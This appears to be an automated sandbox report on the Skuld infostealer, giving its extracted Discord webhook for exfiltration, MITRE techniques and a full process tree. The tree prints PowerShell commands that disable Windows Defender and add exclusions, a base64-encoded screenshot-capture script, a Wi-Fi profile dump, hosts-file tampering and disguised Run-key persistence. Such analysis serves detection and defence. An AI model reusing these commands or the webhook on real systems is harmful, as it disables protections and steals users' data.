skuld | 1bfddb30d8d99718799ec533d513c7eb8e0ca3fd2aff87bb19c3ad0d09b73c13

Analysis

max time kernel
150s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
17-10-2024 01:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skuld.exe
Size

3.3MB
MD5

b5e648164187948c217eea6ccc050309
SHA1

477da0d8ecbd5a701e194a3428d903339688a303
SHA256

1bfddb30d8d99718799ec533d513c7eb8e0ca3fd2aff87bb19c3ad0d09b73c13
SHA512

538c8ccc62ffd4cd4d204df6eb168312b00901b24eb07c92e272555def8420e37dcd9c7fcb4cec84ea9e340563b5c1a6664ab66cdcc5540bf86f09b557141678
SSDEEP

98304:F8egTVW/+U6PyIMEufQgvbK5nW4rC/RV1alA0V5+edf:SF+WWP/R0A0V5+of

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1296277918661738547/GvUWEusnErfhpdvz7DEgE8VzXSZ8oWS_ujEIVSB0XhETe5iWx3tB8zm_wjAS1bJTlXLF

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
396	powershell.exe
1120	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	skuld.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	skuld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	discord.com
3	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3428-0-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/files/0x000800000001ac1a-13.dat	upx
behavioral1/memory/3428-190-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-191-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-192-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-193-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-194-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-195-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-196-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-197-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-198-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-199-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-200-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-201-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-202-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-203-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx
behavioral1/memory/3428-204-0x00000000008B0000-0x00000000012EF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4212	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4804	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	9	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skuld.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	skuld.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
396	powershell.exe
396	powershell.exe
396	powershell.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe
3428	skuld.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3428	skuld.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeIncreaseQuotaPrivilege	396	powershell.exe
Token: SeSecurityPrivilege	396	powershell.exe
Token: SeTakeOwnershipPrivilege	396	powershell.exe
Token: SeLoadDriverPrivilege	396	powershell.exe
Token: SeSystemProfilePrivilege	396	powershell.exe
Token: SeSystemtimePrivilege	396	powershell.exe
Token: SeProfSingleProcessPrivilege	396	powershell.exe
Token: SeIncBasePriorityPrivilege	396	powershell.exe
Token: SeCreatePagefilePrivilege	396	powershell.exe
Token: SeBackupPrivilege	396	powershell.exe
Token: SeRestorePrivilege	396	powershell.exe
Token: SeShutdownPrivilege	396	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeSystemEnvironmentPrivilege	396	powershell.exe
Token: SeRemoteShutdownPrivilege	396	powershell.exe
Token: SeUndockPrivilege	396	powershell.exe
Token: SeManageVolumePrivilege	396	powershell.exe
Token: 33	396	powershell.exe
Token: 34	396	powershell.exe
Token: 35	396	powershell.exe
Token: 36	396	powershell.exe
Token: SeIncreaseQuotaPrivilege	4448	wmic.exe
Token: SeSecurityPrivilege	4448	wmic.exe
Token: SeTakeOwnershipPrivilege	4448	wmic.exe
Token: SeLoadDriverPrivilege	4448	wmic.exe
Token: SeSystemProfilePrivilege	4448	wmic.exe
Token: SeSystemtimePrivilege	4448	wmic.exe
Token: SeProfSingleProcessPrivilege	4448	wmic.exe
Token: SeIncBasePriorityPrivilege	4448	wmic.exe
Token: SeCreatePagefilePrivilege	4448	wmic.exe
Token: SeBackupPrivilege	4448	wmic.exe
Token: SeRestorePrivilege	4448	wmic.exe
Token: SeShutdownPrivilege	4448	wmic.exe
Token: SeDebugPrivilege	4448	wmic.exe
Token: SeSystemEnvironmentPrivilege	4448	wmic.exe
Token: SeRemoteShutdownPrivilege	4448	wmic.exe
Token: SeUndockPrivilege	4448	wmic.exe
Token: SeManageVolumePrivilege	4448	wmic.exe
Token: 33	4448	wmic.exe
Token: 34	4448	wmic.exe
Token: 35	4448	wmic.exe
Token: 36	4448	wmic.exe
Token: SeIncreaseQuotaPrivilege	4448	wmic.exe
Token: SeSecurityPrivilege	4448	wmic.exe
Token: SeTakeOwnershipPrivilege	4448	wmic.exe
Token: SeLoadDriverPrivilege	4448	wmic.exe
Token: SeSystemProfilePrivilege	4448	wmic.exe
Token: SeSystemtimePrivilege	4448	wmic.exe
Token: SeProfSingleProcessPrivilege	4448	wmic.exe
Token: SeIncBasePriorityPrivilege	4448	wmic.exe
Token: SeCreatePagefilePrivilege	4448	wmic.exe
Token: SeBackupPrivilege	4448	wmic.exe
Token: SeRestorePrivilege	4448	wmic.exe
Token: SeShutdownPrivilege	4448	wmic.exe
Token: SeDebugPrivilege	4448	wmic.exe
Token: SeSystemEnvironmentPrivilege	4448	wmic.exe
Token: SeRemoteShutdownPrivilege	4448	wmic.exe
Token: SeUndockPrivilege	4448	wmic.exe
Token: SeManageVolumePrivilege	4448	wmic.exe
Token: 33	4448	wmic.exe
Token: 34	4448	wmic.exe
Token: 35	4448	wmic.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3428 wrote to memory of 532	3428	skuld.exe	73
PID 3428 wrote to memory of 532	3428	skuld.exe	73
PID 3428 wrote to memory of 396	3428	skuld.exe	75
PID 3428 wrote to memory of 396	3428	skuld.exe	75
PID 3428 wrote to memory of 936	3428	skuld.exe	77
PID 3428 wrote to memory of 936	3428	skuld.exe	77
PID 3428 wrote to memory of 4448	3428	skuld.exe	79
PID 3428 wrote to memory of 4448	3428	skuld.exe	79
PID 3428 wrote to memory of 3616	3428	skuld.exe	83
PID 3428 wrote to memory of 3616	3428	skuld.exe	83
PID 3428 wrote to memory of 1120	3428	skuld.exe	85
PID 3428 wrote to memory of 1120	3428	skuld.exe	85
PID 3428 wrote to memory of 4804	3428	skuld.exe	87
PID 3428 wrote to memory of 4804	3428	skuld.exe	87
PID 3428 wrote to memory of 1476	3428	skuld.exe	89
PID 3428 wrote to memory of 1476	3428	skuld.exe	89
PID 3428 wrote to memory of 812	3428	skuld.exe	91
PID 3428 wrote to memory of 812	3428	skuld.exe	91
PID 3428 wrote to memory of 892	3428	skuld.exe	93
PID 3428 wrote to memory of 892	3428	skuld.exe	93
PID 3428 wrote to memory of 4212	3428	skuld.exe	95
PID 3428 wrote to memory of 4212	3428	skuld.exe	95
PID 3428 wrote to memory of 2124	3428	skuld.exe	97
PID 3428 wrote to memory of 2124	3428	skuld.exe	97
PID 2124 wrote to memory of 3144	2124	powershell.exe	99
PID 2124 wrote to memory of 3144	2124	powershell.exe	99
PID 3144 wrote to memory of 1428	3144	csc.exe	100
PID 3144 wrote to memory of 1428	3144	csc.exe	100

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
812	attrib.exe
892	attrib.exe
532	attrib.exe
936	attrib.exe

C:\Users\Admin\AppData\Local\Temp\skuld.exe
"C:\Users\Admin\AppData\Local\Temp\skuld.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\skuld.exe
  2⤵
  - Views/modifies file attributes
  PID:532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\skuld.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:936
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4448
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:3616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1120
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4804
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1476
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:812
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:892
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:4212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4sfzvelq\4sfzvelq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
